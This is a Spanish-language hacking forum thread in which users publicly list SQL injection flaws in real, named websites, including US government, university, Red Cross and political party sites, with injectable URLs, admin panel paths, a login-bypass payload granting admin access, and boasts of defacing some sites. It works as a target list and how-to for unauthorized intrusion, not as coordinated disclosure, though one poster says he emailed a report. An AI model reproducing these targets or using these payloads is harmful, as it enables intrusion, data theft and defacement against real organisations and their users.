• Auditoria Web

  • Aquí se discutirán las principales técnicas usadas para auditar las aplicaciones web, técnicas como SQL Injection, XSS, CSRF, etc.
Aquí se discutirán las principales técnicas usadas para auditar las aplicaciones web, técnicas como SQL Injection, XSS, CSRF, etc.
 #210998  por blackmaster1212
 
parece que las webs de los politicos estan siendo una de las mas vulneradas y con fallos ...}}


skillmax.. grande como siempre bro, eres bueno
 #211794  por LINUXFER
 
Última edición por LINUXFER el 30 Jul 2010, 07:41, editado 1 vez en total.
 #211796  por LINUXFER
 
yeikel escribió:Web : http://www.paginascristianas.net

Metodo : Blind Sql

Bug : http://www.paginascristianas.net/vernot ... idnot='440

Panel : http://www.paginascristianas.net/admin.php

Notas : Web Crisitiana , defaceada . No subi Shell para no hacer daños en la web , solo ese aviso .

Saludos

no es blind es sqli

un saludo!
 #218956  por vizio
 
WEB: http://empleo.diariodemallorca.es

Error: http://empleo.diariodemallorca.es/lib/a ... mpresa.asp,
http://empleo.diariodemallorca.es/muestraoferta.asp?o=

Método Utilizado: SQLi

Descubridor: vizio

Panel: Se logea desde la pagina.


Otros comentarios:
el formulario de autentificación se logea automaticamente con el primer usuario de la tabla (o sea, el admin) inyectándole una condición verdadera
ej.
user: xxx
pass: xxx' or 'x'='x
Para mayor asombro entramos directamente a un panel donde podemos modificar los datos del usuario, entre ellos la password, la cual se imprime en texto plano tan alegremente.
(y yo perdiendo el tiempo aqui http://empleo.diariodemallorca.es/muest ... asp?o='''')

Error reportado vía e-mail en diferentes ocasiones sin respuesta alguna.
 #221878  por biocat
 
 #221973  por Skillmax
 
W4rL0cK escribió:Puedo pedir algo? Lo que pasa es que tengo una web junto con un amigo mio, ya la eh scaneado con el Shadow Security Sacnner pero me sale que no hay bugs ni na de eso y yo sé que en toda web siempre hay fallas... Podrian ver si la mia tiene alguna? La web en cuestion es:

http://www.reggnetwork.net

Si no es molestia claro... Que viva Indetectables.NeT

Hola que tal warlock, mira, si quieres mirar que no sea vulnerable tu web, mirate unos cuantos tutoriales que aparecen en la sección de Auditoria Web sobre como protegerse de cada tipo de ataque.
 #221987  por biocat
 
Web: http://www.imperial.ca.gov/

Error: http://www.imperial.ca.gov/dept.php?id=-1/**/

Metodo: SQLi

Descubridor: Biocat-777

Panel: No lo busqué
_________________________________________________________________________________________________________________________

Web: http://library.tc.columbia.edu/

Error: http://library.tc.columbia.edu/news.php?id='2/**

Metodo: SQLi

Descubridor: Biocat-777

Panel: No lo busqué
_________________________________________________________________________________________________________________________

Web: http://www.sussex.edu/

Error: http://www.sussex.edu/news/story.php?id=-1

Metodo: SQLi

Descubridor: Biocat-777

Panel: No lo busqué
_________________________________________________________________________________________________________________________

Web: http://www.navarrocollege.edu/

Error: http://www.navarrocollege.edu/news-view.php?id='2

Metodo: SQLi

Descubridor: Biocat-777

Panel: No lo busqué
_________________________________________________________________________________________________________________________

Web: http://wdfw.wa.gov/

Error: http://wdfw.wa.gov/news/release.php?id=-1

Metodo: SQLi y Load_File()

Descubridor: Biocat-777

Panel: No lo busqué
_________________________________________________________________________________________________________________________

Web: http://www.cruzroja.org.ar/

Error: http://www.cruzroja.org.ar/new/galeria.php?id?='2

Metodo: SQLi

Descubridor: Biocat-777 y Rex

Panel: No lo busqué
_________________________________________________________________________________________________________________________

Web: http://www.weather.gov/

Error: http://www.weather.gov/climate/local_data.php?wfo=-1/**

Metodo: SQLi

Descubridor: Biocat-777

Panel: No lo busqué
_________________________________________________________________________________________________________________________

Web: http://www.leandertx.gov/

Error: http://www.leandertx.gov/news.php?id='2

Metodo: SQLi

Descubridor: Biocat-777

Panel: No lo busqué
_________________________________________________________________________________________________________________________

Web: http://netic.mobi

Error: http://netic.mobi/modules/pages/index.p ... =%27Biocat

Metodo: SQLi

Descubridor: Biocat-777

Panel: No lo busqué
_________________________________________________________________________________________________________________________

Web: http://www.elpartidodelau.com/

Error: http://www.elpartidodelau.com/index.php?p=17&gal=-'2

Metodo: SQLi

Descubridor: Biocat-777

Panel: No lo busqué
_________________________________________________________________________________________________________________________

PD: el partido de la u, ya fue defaceado ;)
 #224492  por akonft
 
Hola Skillmax, me parece muy interesante estos temas, me gustaría iniciarme en esto y aprender a como encontrar fallos y como explotarlos, existe algun manual por aquí? no deja entrar al buscador
 #224499  por akonft
 
Skillmax escribió:Auditoria Web, amigo..
Que me quieres decir? estoy en Auditoria Web
 #224698  por Skillmax
 
akonft escribió:
Skillmax escribió:Auditoria Web, amigo..
Que me quieres decir? estoy en Auditoria Web

Lo que te quiero decir es que busques en Auditoria Web, hay muchos manuales.-
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 14